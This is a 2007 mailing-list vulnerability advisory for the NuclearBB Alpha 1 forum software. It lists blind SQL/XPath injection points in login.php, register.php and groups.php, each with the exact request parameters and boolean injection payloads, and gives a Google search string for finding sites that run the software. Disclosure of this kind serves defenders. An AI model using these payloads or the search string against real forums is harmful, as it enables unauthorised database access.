NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection
Date: 18 Apr 2007 19:16:26 -0000
From: [email protected]
To: [email protected]
Subject: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection
Vulnerabilities
X-Virus-Scanned: antivirus-gw at tyumen.ru
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"
=============
String Inputs
=============
----------------------------
login.php - $_POST['submit']
username=xyz
password=passxyz
submit=Login"+and+"1"="0
--------------------------------
register.php - $_POST['website']
[email protected]
[email protected]
pass1=passwordxyz
pass2=passwordxyz
[email protected]"+and+"1"="0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over
register_submit=Register
----------------------------
register.php - $_POST['aol']
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
[email protected]
[email protected]
coppa_state=over
register_submit=Register
----------------------------------
register.php - $_POST['signature']
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
coppa_state=over
register_submit=Register
==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
http://www.example.com/groups.php?g=1+and+1=0
------------------------------
register.php - $_POST['email']
[email protected]
[email protected]+and+1=0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over®ister_submit=Register
John Martinelli
[email protected]
http://john-martinelli.com
April 18th, 2007